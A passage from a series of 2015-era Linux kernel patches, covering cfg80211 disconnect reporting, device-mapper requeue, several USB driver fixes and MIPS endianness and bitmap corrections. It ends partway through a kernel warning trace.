*/ -void lbs_mac_event_disconnected(struct lbs_private *priv); +void lbs_mac_event_disconnected(struct lbs_private *priv, + bool locally_generated); diff --git a/drivers/net/wireless/libertas/cmdresp.c b/drivers/net/wireless/libertas/cmdresp.c index 65f18f1e869c..e5442e8956f7 100644 --- a/drivers/net/wireless/libertas/cmdresp.c +++ b/drivers/net/wireless/libertas/cmdresp.c @@ -19,10 +19,13 @@ * reset link state etc. 
* * @priv: A pointer to struct lbs_private structure + * @locally_generated: indicates disconnect was requested locally + * (usually by userspace) * * returns: n/a */ -void lbs_mac_event_disconnected(struct lbs_private *priv) +void lbs_mac_event_disconnected(struct lbs_private *priv, + bool locally_generated) { if (priv->connect_status != LBS_CONNECTED) return; @@ -36,7 +39,7 @@ void lbs_mac_event_disconnected(struct lbs_private *priv) msleep_interruptible(1000); if (priv->wdev->iftype == NL80211_IFTYPE_STATION) - lbs_send_disconnect_notification(priv); + lbs_send_disconnect_notification(priv, locally_generated); /* report disconnect to upper layer */ netif_stop_queue(priv->dev); @@ -229,17 +232,17 @@ int lbs_process_event(struct lbs_private *priv, u32 event) case MACREG_INT_CODE_DEAUTHENTICATED: lbs_deb_cmd("EVENT: deauthenticated\n"); - lbs_mac_event_disconnected(priv); + lbs_mac_event_disconnected(priv, false); break; case MACREG_INT_CODE_DISASSOCIATED: lbs_deb_cmd("EVENT: disassociated\n"); - lbs_mac_event_disconnected(priv); + lbs_mac_event_disconnected(priv, false); break; case MACREG_INT_CODE_LINK_LOST_NO_SCAN: lbs_deb_cmd("EVENT: link lost\n"); - lbs_mac_event_disconnected(priv); + lbs_mac_event_disconnected(priv, true); break; case MACREG_INT_CODE_PS_SLEEP: diff --git a/drivers/net/wireless/mwifiex/join.c b/drivers/net/wireless/mwifiex/join.c index 411a6c2f4aca..080ec3422db9 100644 --- a/drivers/net/wireless/mwifiex/join.c +++ b/drivers/net/wireless/mwifiex/join.c @@ -1421,7 +1421,7 @@ int mwifiex_deauthenticate(struct mwifiex_private *priv, u8 *mac) ret = mwifiex_deauthenticate_infra(priv, mac); if (ret) cfg80211_disconnected(priv->netdev, 0, NULL, 0, - GFP_KERNEL); + true, GFP_KERNEL); break; case NL80211_IFTYPE_ADHOC: return mwifiex_send_cmd(priv, HostCmd_CMD_802_11_AD_HOC_STOP, diff --git a/drivers/net/wireless/mwifiex/sta_event.c b/drivers/net/wireless/mwifiex/sta_event.c index 0dc7a1d3993d..c9064b88d6a4 100644 --- a/drivers/net/wireless/mwifiex/sta_event.c +++ b/drivers/net/wireless/mwifiex/sta_event.c @@ -133,7 +133,7 @@ mwifiex_reset_connect_state(struct mwifiex_private *priv, u16 reason_code) if (priv->bss_mode == NL80211_IFTYPE_STATION || priv->bss_mode == NL80211_IFTYPE_P2P_CLIENT) { cfg80211_disconnected(priv->netdev, reason_code, NULL, 0, - GFP_KERNEL); + false, GFP_KERNEL); } eth_zero_addr(priv->cfg_bssid); diff --git a/drivers/net/wireless/rndis_wlan.c b/drivers/net/wireless/rndis_wlan.c index d72ff8e7125d..43db6976102f 100644 --- a/drivers/net/wireless/rndis_wlan.c +++ b/drivers/net/wireless/rndis_wlan.c @@ -2861,7 +2861,7 @@ static void rndis_wlan_do_link_down_work(struct usbnet *usbdev) deauthenticate(usbdev); - cfg80211_disconnected(usbdev->net, 0, NULL, 0, GFP_KERNEL); + cfg80211_disconnected(usbdev->net, 0, NULL, 0, true, GFP_KERNEL); } netif_carrier_off(usbdev->net); diff --git a/drivers/staging/rtl8723au/os_dep/ioctl_cfg80211.c b/drivers/staging/rtl8723au/os_dep/ioctl_cfg80211.c index bc95ce89af06..5ab2f6978209 100644 --- a/drivers/staging/rtl8723au/os_dep/ioctl_cfg80211.c +++ b/drivers/staging/rtl8723au/os_dep/ioctl_cfg80211.c @@ -379,7 +379,7 @@ void rtw_cfg80211_indicate_disconnect(struct rtw_adapter *padapter) GFP_ATOMIC); } else { cfg80211_disconnected(padapter->pnetdev, 0, NULL, - 0, GFP_ATOMIC); + 0, false, GFP_ATOMIC); } } } diff --git a/drivers/staging/wlan-ng/cfg80211.c b/drivers/staging/wlan-ng/cfg80211.c index 7c87aecf4744..342e2b30c48f 100644 --- a/drivers/staging/wlan-ng/cfg80211.c +++ b/drivers/staging/wlan-ng/cfg80211.c @@ -722,7 +722,7 @@ 
void prism2_connect_result(wlandevice_t *wlandev, u8 failed) void prism2_disconnected(wlandevice_t *wlandev) { cfg80211_disconnected(wlandev->netdev, 0, NULL, - 0, GFP_KERNEL); + 0, false, GFP_KERNEL); } void prism2_roamed(wlandevice_t *wlandev) diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h index d63ecec73090..a741678f24a2 100644 --- a/include/net/cfg80211.h +++ b/include/net/cfg80211.h @@ -4575,13 +4575,15 @@ void cfg80211_roamed_bss(struct net_device *dev, struct cfg80211_bss *bss, * @ie: information elements of the deauth/disassoc frame (may be %NULL) * @ie_len: length of IEs * @reason: reason code for the disconnection, set it to 0 if unknown + * @locally_generated: disconnection was requested locally * @gfp: allocation flags * * After it calls this function, the driver should enter an idle state * and not try to connect to any AP any more. */ void cfg80211_disconnected(struct net_device *dev, u16 reason, - const u8 *ie, size_t ie_len, gfp_t gfp); + const u8 *ie, size_t ie_len, + bool locally_generated, gfp_t gfp); /** * cfg80211_ready_on_channel - notification of remain_on_channel start diff --git a/net/wireless/core.h b/net/wireless/core.h index 801cd49c5a0c..311eef26bf88 100644 --- a/net/wireless/core.h +++ b/net/wireless/core.h @@ -222,6 +222,7 @@ struct cfg80211_event { const u8 *ie; size_t ie_len; u16 reason; + bool locally_generated; } dc; struct { u8 bssid[ETH_ALEN]; diff --git a/net/wireless/sme.c b/net/wireless/sme.c index d11454f87bac..8020b5b094d4 100644 --- a/net/wireless/sme.c +++ b/net/wireless/sme.c @@ -938,7 +938,8 @@ void __cfg80211_disconnected(struct net_device *dev, const u8 *ie, } void cfg80211_disconnected(struct net_device *dev, u16 reason, - const u8 *ie, size_t ie_len, gfp_t gfp) + const u8 *ie, size_t ie_len, + bool locally_generated, gfp_t gfp) { struct wireless_dev *wdev = dev->ieee80211_ptr; struct cfg80211_registered_device *rdev = wiphy_to_rdev(wdev->wiphy); @@ -954,6 +955,7 @@ void cfg80211_disconnected(struct net_device *dev, u16 reason, ev->dc.ie_len = ie_len; memcpy((void *)ev->dc.ie, ie, ie_len); ev->dc.reason = reason; + ev->dc.locally_generated = locally_generated; spin_lock_irqsave(&wdev->event_lock, flags); list_add_tail(&ev->list, &wdev->event_list); diff --git a/net/wireless/util.c b/net/wireless/util.c index 70051ab52f4f..4cb34557b873 100644 --- a/net/wireless/util.c +++ b/net/wireless/util.c @@ -887,7 +887,8 @@ void cfg80211_process_wdev_events(struct wireless_dev *wdev) case EVENT_DISCONNECTED: __cfg80211_disconnected(wdev->netdev, ev->dc.ie, ev->dc.ie_len, - ev->dc.reason, true); + ev->dc.reason, + !ev->dc.locally_generated); break; case EVENT_IBSS_JOINED: __cfg80211_ibss_joined(wdev->netdev, ev->ij.bssid, From 4ae9944d132b160d444fa3aa875307eb0fa3eeec Mon Sep 17 00:00:00 2001 From: Junichi Nomura Date: Tue, 26 May 2015 08:25:54 +0000 Subject: [PATCH 226/872] dm: run queue on re-queue Without kicking queue, requeued request may stay forever in the queue if there are no other I/O activities to the device. The original error had been in v2.6.39 with commit 7eaceaccab5f ("block: remove per-queue plugging"), which replaced conditional plugging by periodic runqueue. Commit 9d1deb83d489 in v4.1-rc1 removed the periodic runqueue and the problem started to manifest. 
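The fix itself is a single call: kick the queue right after putting the request back, so it gets redispatched even when no other I/O arrives (the patched helper, reproduced here for readability):

        spin_lock_irqsave(q->queue_lock, flags);
        blk_requeue_request(q, rq);
        blk_run_queue_async(q);
        spin_unlock_irqrestore(q->queue_lock, flags);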
Fixes: 9d1deb83d489 ("dm: don't schedule delayed run of the queue if nothing to do") Signed-off-by: Jun'ichi Nomura Signed-off-by: Mike Snitzer --- drivers/md/dm.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/md/dm.c b/drivers/md/dm.c index a930b72314ac..0bf79a0bad37 100644 --- a/drivers/md/dm.c +++ b/drivers/md/dm.c @@ -1164,6 +1164,7 @@ static void old_requeue_request(struct request *rq) spin_lock_irqsave(q->queue_lock, flags); blk_requeue_request(q, rq); + blk_run_queue_async(q); spin_unlock_irqrestore(q->queue_lock, flags); } From 7cc99f1e9ae0e657c9a9126d042a342ea786ef08 Mon Sep 17 00:00:00 2001 From: Yoshihiro Shimoda Date: Wed, 8 Apr 2015 19:42:24 +0900 Subject: [PATCH 227/872] usb: renesas_usbhs: Revise the binding document about the dma-names Since the DT should describe the hardware (not the driver limitation), This patch revises the binding document about the dma-names to change simple numbering as "ch%d" instead of "tx" and "rx". Also this patch fixes the actual code of renesas_usbhs driver to handle the new dma-names. Signed-off-by: Yoshihiro Shimoda Acked-by: Mark Rutland Acked-by: Geert Uytterhoeven Signed-off-by: Felipe Balbi --- .../devicetree/bindings/usb/renesas_usbhs.txt | 6 ++--- drivers/usb/renesas_usbhs/fifo.c | 24 ++++++++++++------- 2 files changed, 17 insertions(+), 13 deletions(-) diff --git a/Documentation/devicetree/bindings/usb/renesas_usbhs.txt b/Documentation/devicetree/bindings/usb/renesas_usbhs.txt index dc2a18f0b3a1..ddbe304beb21 100644 --- a/Documentation/devicetree/bindings/usb/renesas_usbhs.txt +++ b/Documentation/devicetree/bindings/usb/renesas_usbhs.txt @@ -15,10 +15,8 @@ Optional properties: - phys: phandle + phy specifier pair - phy-names: must be "usb" - dmas: Must contain a list of references to DMA specifiers. - - dma-names : Must contain a list of DMA names: - - tx0 ... tx - - rx0 ... rx - - This means DnFIFO in USBHS module. + - dma-names : named "ch%d", where %d is the channel number ranging from zero + to the number of channels (DnFIFOs) minus one. Example: usbhs: usb@e6590000 { diff --git a/drivers/usb/renesas_usbhs/fifo.c b/drivers/usb/renesas_usbhs/fifo.c index 8597cf9cfceb..bc23b4a2c415 100644 --- a/drivers/usb/renesas_usbhs/fifo.c +++ b/drivers/usb/renesas_usbhs/fifo.c @@ -1227,15 +1227,21 @@ static void usbhsf_dma_init_dt(struct device *dev, struct usbhs_fifo *fifo, { char name[16]; - snprintf(name, sizeof(name), "tx%d", channel); - fifo->tx_chan = dma_request_slave_channel_reason(dev, name); - if (IS_ERR(fifo->tx_chan)) - fifo->tx_chan = NULL; - - snprintf(name, sizeof(name), "rx%d", channel); - fifo->rx_chan = dma_request_slave_channel_reason(dev, name); - if (IS_ERR(fifo->rx_chan)) - fifo->rx_chan = NULL; + /* + * To avoid complex handing for DnFIFOs, the driver uses each + * DnFIFO as TX or RX direction (not bi-direction). + * So, the driver uses odd channels for TX, even channels for RX. 
+ */ + snprintf(name, sizeof(name), "ch%d", channel); + if (channel & 1) { + fifo->tx_chan = dma_request_slave_channel_reason(dev, name); + if (IS_ERR(fifo->tx_chan)) + fifo->tx_chan = NULL; + } else { + fifo->rx_chan = dma_request_slave_channel_reason(dev, name); + if (IS_ERR(fifo->rx_chan)) + fifo->rx_chan = NULL; + } } static void usbhsf_dma_init(struct usbhs_priv *priv, struct usbhs_fifo *fifo, From 2b12978928e902d234104b24f589bbe38909fad7 Mon Sep 17 00:00:00 2001 From: Fabio Estevam Date: Fri, 22 May 2015 23:28:15 -0300 Subject: [PATCH 228/872] usb: phy: ab8500-usb: Pass the IRQF_ONESHOT flag Since commit 1c6c69525b40 ("genirq: Reject bogus threaded irq requests") threaded IRQs without a primary handler need to be requested with IRQF_ONESHOT, otherwise the request will fail. So pass the IRQF_ONESHOT flag in this case. The semantic patch that makes this change is available in scripts/coccinelle/misc/irqf_oneshot.cocci. Signed-off-by: Fabio Estevam Signed-off-by: Felipe Balbi --- drivers/usb/phy/phy-ab8500-usb.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/usb/phy/phy-ab8500-usb.c b/drivers/usb/phy/phy-ab8500-usb.c index 7225d526df04..03ab0c699f74 100644 --- a/drivers/usb/phy/phy-ab8500-usb.c +++ b/drivers/usb/phy/phy-ab8500-usb.c @@ -1179,7 +1179,7 @@ static int ab8500_usb_irq_setup(struct platform_device *pdev, } err = devm_request_threaded_irq(&pdev->dev, irq, NULL, ab8500_usb_link_status_irq, - IRQF_NO_SUSPEND | IRQF_SHARED, + IRQF_NO_SUSPEND | IRQF_SHARED | IRQF_ONESHOT, "usb-link-status", ab); if (err < 0) { dev_err(ab->dev, "request_irq failed for link status irq\n"); @@ -1195,7 +1195,7 @@ static int ab8500_usb_irq_setup(struct platform_device *pdev, } err = devm_request_threaded_irq(&pdev->dev, irq, NULL, ab8500_usb_disconnect_irq, - IRQF_NO_SUSPEND | IRQF_SHARED, + IRQF_NO_SUSPEND | IRQF_SHARED | IRQF_ONESHOT, "usb-id-fall", ab); if (err < 0) { dev_err(ab->dev, "request_irq failed for ID fall irq\n"); @@ -1211,7 +1211,7 @@ static int ab8500_usb_irq_setup(struct platform_device *pdev, } err = devm_request_threaded_irq(&pdev->dev, irq, NULL, ab8500_usb_disconnect_irq, - IRQF_NO_SUSPEND | IRQF_SHARED, + IRQF_NO_SUSPEND | IRQF_SHARED | IRQF_ONESHOT, "usb-vbus-fall", ab); if (err < 0) { dev_err(ab->dev, "request_irq failed for Vbus fall irq\n"); From a81df9eedf7d29d747c86fed2402bd416bacd7a3 Mon Sep 17 00:00:00 2001 From: Fabio Estevam Date: Fri, 22 May 2015 23:28:16 -0300 Subject: [PATCH 229/872] usb: phy: tahvo: Pass the IRQF_ONESHOT flag Since commit 1c6c69525b40 ("genirq: Reject bogus threaded irq requests") threaded IRQs without a primary handler need to be requested with IRQF_ONESHOT, otherwise the request will fail. So pass the IRQF_ONESHOT flag in this case. The semantic patch that makes this change is available in scripts/coccinelle/misc/irqf_oneshot.cocci. 
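The rule applied by this and the previous patch: a threaded interrupt requested with a NULL primary handler must pass IRQF_ONESHOT, which keeps the interrupt line masked until the thread function has finished. A generic sketch (the foo_* names are placeholders, not taken from these drivers):

        /* NULL primary handler -> IRQF_ONESHOT is mandatory */
        ret = request_threaded_irq(irq, NULL, foo_thread_fn,
                                   IRQF_ONESHOT, "foo-irq", priv);
        if (ret)
                dev_err(dev, "could not request irq %d: %d\n", irq, ret);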
Signed-off-by: Fabio Estevam Signed-off-by: Felipe Balbi --- drivers/usb/phy/phy-tahvo.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/usb/phy/phy-tahvo.c b/drivers/usb/phy/phy-tahvo.c index 845f658276b1..2b28443d07b9 100644 --- a/drivers/usb/phy/phy-tahvo.c +++ b/drivers/usb/phy/phy-tahvo.c @@ -401,7 +401,8 @@ static int tahvo_usb_probe(struct platform_device *pdev) dev_set_drvdata(&pdev->dev, tu); tu->irq = platform_get_irq(pdev, 0); - ret = request_threaded_irq(tu->irq, NULL, tahvo_usb_vbus_interrupt, 0, + ret = request_threaded_irq(tu->irq, NULL, tahvo_usb_vbus_interrupt, + IRQF_ONESHOT, "tahvo-vbus", tu); if (ret) { dev_err(&pdev->dev, "could not register tahvo-vbus irq: %d\n", From 459e210c4fd034d20077bcec31fec9472a700fe9 Mon Sep 17 00:00:00 2001 From: Subbaraya Sundeep Bhatta Date: Thu, 21 May 2015 15:46:46 +0530 Subject: [PATCH 230/872] usb: dwc3: gadget: Fix incorrect DEPCMD and DGCMD status macros Fixed the incorrect macro definitions correctly as per databook. Signed-off-by: Subbaraya Sundeep Bhatta Fixes: b09bb64239c8 (usb: dwc3: gadget: implement Global Command support) Cc: #v3.5+ Signed-off-by: Felipe Balbi --- drivers/usb/dwc3/core.h | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h index fdab715a0631..c0eafa6fd403 100644 --- a/drivers/usb/dwc3/core.h +++ b/drivers/usb/dwc3/core.h @@ -339,7 +339,7 @@ #define DWC3_DGCMD_SET_ENDPOINT_NRDY 0x0c #define DWC3_DGCMD_RUN_SOC_BUS_LOOPBACK 0x10 -#define DWC3_DGCMD_STATUS(n) (((n) >> 15) & 1) +#define DWC3_DGCMD_STATUS(n) (((n) >> 12) & 0x0F) #define DWC3_DGCMD_CMDACT (1 << 10) #define DWC3_DGCMD_CMDIOC (1 << 8) @@ -355,7 +355,7 @@ #define DWC3_DEPCMD_PARAM_SHIFT 16 #define DWC3_DEPCMD_PARAM(x) ((x) << DWC3_DEPCMD_PARAM_SHIFT) #define DWC3_DEPCMD_GET_RSC_IDX(x) (((x) >> DWC3_DEPCMD_PARAM_SHIFT) & 0x7f) -#define DWC3_DEPCMD_STATUS(x) (((x) >> 15) & 1) +#define DWC3_DEPCMD_STATUS(x) (((x) >> 12) & 0x0F) #define DWC3_DEPCMD_HIPRI_FORCERM (1 << 11) #define DWC3_DEPCMD_CMDACT (1 << 10) #define DWC3_DEPCMD_CMDIOC (1 << 8) From e21422de817ab0b67ed1902fe1383bcdeece855e Mon Sep 17 00:00:00 2001 From: James Hogan Date: Tue, 28 Apr 2015 10:57:29 +0100 Subject: [PATCH 231/872] MIPS: Fix CDMM to use native endian MMIO reads The MIPS Common Device Memory Map (CDMM) is internal to the core and has native endianness. There is therefore no need to byte swap the accesses on big endian targets, so convert the CDMM bus driver to use __raw_readl() rather than readl(). 
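The difference between the two accessors, in short (a sketch; cdmm and offset stand for any pointer into the CDMM region):

        val = readl(cdmm + offset);       /* treats the register as little-endian, byte swaps on big-endian kernels */
        val = __raw_readl(cdmm + offset); /* raw native-endian access, no swapping and no barriers */

Because the CDMM block has native endianness, only the raw accessor returns the register value unchanged on both big- and little-endian configurations.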
Fixes: 8286ae03308c ("MIPS: Add CDMM bus support") Signed-off-by: James Hogan Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/9904/ Signed-off-by: Ralf Baechle --- drivers/bus/mips_cdmm.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/bus/mips_cdmm.c b/drivers/bus/mips_cdmm.c index 5bd792c68f9b..ab3bde16ecb4 100644 --- a/drivers/bus/mips_cdmm.c +++ b/drivers/bus/mips_cdmm.c @@ -453,7 +453,7 @@ void __iomem *mips_cdmm_early_probe(unsigned int dev_type) /* Look for a specific device type */ for (; drb < bus->drbs; drb += size + 1) { - acsr = readl(cdmm + drb * CDMM_DRB_SIZE); + acsr = __raw_readl(cdmm + drb * CDMM_DRB_SIZE); type = (acsr & CDMM_ACSR_DEVTYPE) >> CDMM_ACSR_DEVTYPE_SHIFT; if (type == dev_type) return cdmm + drb * CDMM_DRB_SIZE; @@ -500,7 +500,7 @@ static void mips_cdmm_bus_discover(struct mips_cdmm_bus *bus) bus->discovered = true; pr_info("cdmm%u discovery (%u blocks)\n", cpu, bus->drbs); for (; drb < bus->drbs; drb += size + 1) { - acsr = readl(cdmm + drb * CDMM_DRB_SIZE); + acsr = __raw_readl(cdmm + drb * CDMM_DRB_SIZE); type = (acsr & CDMM_ACSR_DEVTYPE) >> CDMM_ACSR_DEVTYPE_SHIFT; size = (acsr & CDMM_ACSR_DEVSIZE) >> CDMM_ACSR_DEVSIZE_SHIFT; rev = (acsr & CDMM_ACSR_DEVREV) >> CDMM_ACSR_DEVREV_SHIFT; From 70f041b6e1ff508750988ffd034ac6117d34d4d7 Mon Sep 17 00:00:00 2001 From: James Hogan Date: Tue, 28 Apr 2015 10:57:30 +0100 Subject: [PATCH 232/872] ttyFDC: Fix to use native endian MMIO reads The MIPS Common Device Memory Map (CDMM) is internal to the core and has native endianness. There is therefore no need to byte swap the accesses on big endian targets, so convert the Fast Debug Channel (FDC) TTY driver to use __raw_readl()/__raw_writel() rather than ioread32()/iowrite32(). Fixes: 4cebec609aea ("TTY: Add MIPS EJTAG Fast Debug Channel TTY driver") Fixes: c2d7ef51d731 ("ttyFDC: Implement KGDB IO operations.") Signed-off-by: James Hogan Cc: Ralf Baechle Cc: Jiri Slaby Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/9905/ Acked-by: Greg Kroah-Hartman Signed-off-by: Ralf Baechle --- drivers/tty/mips_ejtag_fdc.c | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/drivers/tty/mips_ejtag_fdc.c b/drivers/tty/mips_ejtag_fdc.c index 04d9e23d1ee1..358323c83b4f 100644 --- a/drivers/tty/mips_ejtag_fdc.c +++ b/drivers/tty/mips_ejtag_fdc.c @@ -174,13 +174,13 @@ struct mips_ejtag_fdc_tty { static inline void mips_ejtag_fdc_write(struct mips_ejtag_fdc_tty *priv, unsigned int offs, unsigned int data) { - iowrite32(data, priv->reg + offs); + __raw_writel(data, priv->reg + offs); } static inline unsigned int mips_ejtag_fdc_read(struct mips_ejtag_fdc_tty *priv, unsigned int offs) { - return ioread32(priv->reg + offs); + return __raw_readl(priv->reg + offs); } /* Encoding of byte stream in FDC words */ @@ -347,9 +347,9 @@ static void mips_ejtag_fdc_console_write(struct console *c, const char *s, s += inc[word.bytes - 1]; /* Busy wait until there's space in fifo */ - while (ioread32(regs + REG_FDSTAT) & REG_FDSTAT_TXF) + while (__raw_readl(regs + REG_FDSTAT) & REG_FDSTAT_TXF) ; - iowrite32(word.word, regs + REG_FDTX(c->index)); + __raw_writel(word.word, regs + REG_FDTX(c->index)); } out: local_irq_restore(flags); @@ -1227,7 +1227,7 @@ static int kgdbfdc_read_char(void) /* Read next word from KGDB channel */ do { - stat = ioread32(regs + REG_FDSTAT); + stat = __raw_readl(regs + REG_FDSTAT); /* No data waiting? 
*/ if (stat & REG_FDSTAT_RXE) @@ -1236,7 +1236,7 @@ static int kgdbfdc_read_char(void) /* Read next word */ channel = (stat & REG_FDSTAT_RXCHAN) >> REG_FDSTAT_RXCHAN_SHIFT; - data = ioread32(regs + REG_FDRX); + data = __raw_readl(regs + REG_FDRX); } while (channel != CONFIG_MIPS_EJTAG_FDC_KGDB_CHAN); /* Decode into rbuf */ @@ -1266,9 +1266,10 @@ static void kgdbfdc_push_one(void) return; /* Busy wait until there's space in fifo */ - while (ioread32(regs + REG_FDSTAT) & REG_FDSTAT_TXF) + while (__raw_readl(regs + REG_FDSTAT) & REG_FDSTAT_TXF) ; - iowrite32(word.word, regs + REG_FDTX(CONFIG_MIPS_EJTAG_FDC_KGDB_CHAN)); + __raw_writel(word.word, + regs + REG_FDTX(CONFIG_MIPS_EJTAG_FDC_KGDB_CHAN)); } /* flush the whole write buffer to the TX FIFO */ From 884e7e5e7d1a35b944436895852d5ed24e79d42e Mon Sep 17 00:00:00 2001 From: Joe Perches Date: Wed, 20 May 2015 05:44:54 -0700 Subject: [PATCH 233/872] MIPS: irq: Use DECLARE_BITMAP Use the generic mechanism to declare a bitmap instead of unsigned long. This could fix an overwrite defect of whatever follows irq_map. Not all "#define NR_IRQS " are a multiple of BITS_PER_LONG so using DECLARE_BITMAP allocates the proper number of longs required for the possible bits. For instance: arch/mips/include/asm/mach-ath79/irq.h:#define NR_IRQS 51 arch/mips/include/asm/mach-db1x00/irq.h:#define NR_IRQS 152 arch/mips/include/asm/mach-lantiq/falcon/irq.h:#define NR_IRQS 328 Signed-off-by: Joe Perches Cc: linux-mips Cc: LKML Cc: Gabor Juhos Cc: Manuel Lauss Cc: John Crispin Patchwork: https://patchwork.linux-mips.org/patch/10091/ Signed-off-by: Ralf Baechle --- arch/mips/kernel/irq.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/kernel/irq.c b/arch/mips/kernel/irq.c index d2bfbc2e8995..51f57d841662 100644 --- a/arch/mips/kernel/irq.c +++ b/arch/mips/kernel/irq.c @@ -29,7 +29,7 @@ int kgdb_early_setup; #endif -static unsigned long irq_map[NR_IRQS / BITS_PER_LONG]; +static DECLARE_BITMAP(irq_map, NR_IRQS); int allocate_irqno(void) { From 5767b52c47488e288c6b6f94e4739e1fdfdf4e81 Mon Sep 17 00:00:00 2001 From: Geert Uytterhoeven Date: Tue, 26 May 2015 12:54:18 +0200 Subject: [PATCH 234/872] MIPS: Fuloong 2E: Replace CONFIG_USB_ISP1760_HCD by CONFIG_USB_ISP1760 Since commit 100832abf065bc18 ("usb: isp1760: Make HCD support optional"), CONFIG_USB_ISP1760_HCD is automatically selected when needed. Enabling that option in the defconfig is now a no-op, and no longer enables ISP1760 HCD support. Re-enable the ISP1760 driver in the defconfig by enabling USB_ISP1760_HOST_ROLE instead. 
Signed-off-by: Geert Uytterhoeven Cc: Laurent Pinchart Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/10180/ Signed-off-by: Ralf Baechle --- arch/mips/configs/fuloong2e_defconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/configs/fuloong2e_defconfig b/arch/mips/configs/fuloong2e_defconfig index 002680648dcb..b2a577ebce0b 100644 --- a/arch/mips/configs/fuloong2e_defconfig +++ b/arch/mips/configs/fuloong2e_defconfig @@ -194,7 +194,7 @@ CONFIG_USB_WUSB_CBAF=m CONFIG_USB_C67X00_HCD=m CONFIG_USB_EHCI_HCD=y CONFIG_USB_EHCI_ROOT_HUB_TT=y -CONFIG_USB_ISP1760_HCD=m +CONFIG_USB_ISP1760=m CONFIG_USB_OHCI_HCD=y CONFIG_USB_UHCI_HCD=m CONFIG_USB_R8A66597_HCD=m From 10f095801cda5cdf24839e2fe90c08cb85a28da6 Mon Sep 17 00:00:00 2001 From: Sergiy Kibrik Date: Sat, 16 May 2015 16:55:03 +0300 Subject: [PATCH 235/872] usb: s3c2410_udc: correct reversed pullup logic For some reason the code has always been disabling the pullup when asked to do the opposite. According to the surrounding code and the gadget API this seems to be a mistake. This fix allows the UDC to be detected by the host controller on recent kernels. Signed-off-by: Sergiy Kibrik Signed-off-by: Felipe Balbi --- drivers/usb/gadget/udc/s3c2410_udc.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/usb/gadget/udc/s3c2410_udc.c b/drivers/usb/gadget/udc/s3c2410_udc.c index b808951491cc..99fd9a5667df 100644 --- a/drivers/usb/gadget/udc/s3c2410_udc.c +++ b/drivers/usb/gadget/udc/s3c2410_udc.c @@ -1487,7 +1487,7 @@ static int s3c2410_udc_pullup(struct usb_gadget *gadget, int is_on) dprintk(DEBUG_NORMAL, "%s()\n", __func__); - s3c2410_udc_set_pullup(udc, is_on ? 0 : 1); + s3c2410_udc_set_pullup(udc, is_on); return 0; } From c41b33c58d11f32e95d06f634ddba0cbf39fc7c6 Mon Sep 17 00:00:00 2001 From: Krzysztof Opasiak Date: Fri, 22 May 2015 17:25:17 +0200 Subject: [PATCH 236/872] usb: gadget: g_ffs: Fix counting of missing_functions Returning a non-zero value from the ready callback makes the ffs instance return an error from writing strings and enter the FFS_CLOSING state. This means that this function is not truly ready and the close callback will not be called. This commit fixes ffs_ready_callback() to undo all side effects of this function in case of error. Signed-off-by: Krzysztof Opasiak Signed-off-by: Felipe Balbi --- drivers/usb/gadget/legacy/g_ffs.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/usb/gadget/legacy/g_ffs.c b/drivers/usb/gadget/legacy/g_ffs.c index 7b9ef7e257d2..e821931c965c 100644 --- a/drivers/usb/gadget/legacy/g_ffs.c +++ b/drivers/usb/gadget/legacy/g_ffs.c @@ -304,8 +304,10 @@ static int functionfs_ready_callback(struct ffs_data *ffs) gfs_registered = true; ret = usb_composite_probe(&gfs_driver); - if (unlikely(ret < 0)) + if (unlikely(ret < 0)) { + ++missing_funcs; gfs_registered = false; + } return ret; } From 49a79d8b0a5f8239b8424a3eb730006faada0ad8 Mon Sep 17 00:00:00 2001 From: Krzysztof Opasiak Date: Fri, 22 May 2015 17:25:18 +0200 Subject: [PATCH 237/872] usb: gadget: ffs: fix: Always call ffs_closed() in ffs_data_clear() Originally, the FFS_FL_CALL_CLOSED_CALLBACK flag was used to indicate whether we should call ffs_closed_callback(). Commit 4b187fceec3c ("usb: gadget: FunctionFS: add devices management code") changed its semantics to indicate whether we should call the ffs_closed() function, which does a little bit more.
This situation leads to: [ 122.362269] ------------[ cut here ]------------ [ 122.362287] WARNING: CPU: 2 PID: 2384 at drivers/usb/gadget/function/f_fs.c:3417 ffs_ep0_write+0x730/0x810 [usb_f_fs]() [ 122.362292] Modules linked in: [ 122.362555] CPU: 2 PID: 2384 Comm: adbd Tainted: G W 4.1.0-0.rc4.git0.1.1.fc22.i686 #1 [ 122.362561] Hardware name: To be filled by O.E.M. To be filled by O.E.M./Aptio CRB, BIOS 5.6.5 07/25/2014 [ 122.362567] c0d1f947 415badfa 00000000 d1029e64 c0a86e54 00000000 d1029e94 c045b937 [ 122.362584] c0c37f94 00000002 00000950 f9b313d4 00000d59 f9b2ebf0 f9b2ebf0 fffffff0 [ 122.362600] 00000003 deb53d00 d1029ea4 c045ba42 00000009 00000000 d1029f08 f9b2ebf0 [ 122.362617] Call Trace: [ 122.362633] [] dump_stack+0x41/0x52 [ 122.362645] [] warn_slowpath_common+0x87/0xc0 [ 122.362658] [] ? ffs_ep0_write+0x730/0x810 [usb_f_fs] [ 122.362668] [] ? ffs_ep0_write+0x730/0x810 [usb_f_fs] [ 122.362678] [] warn_slowpath_null+0x22/0x30 [ 122.362689] [] ffs_ep0_write+0x730/0x810 [usb_f_fs] [ 122.362702] [] ? ffs_ep0_read+0x380/0x380 [usb_f_fs] [ 122.362712] [] __vfs_write+0x2f/0x100 [ 122.362722] [] ? __sb_start_write+0x52/0x110 [ 122.362731] [] vfs_write+0x94/0x1b0 [ 122.362740] [] ? mutex_lock+0x10/0x30 [ 122.362749] [] SyS_write+0x51/0xb0 [ 122.362759] [] sysenter_do_call+0x12/0x12 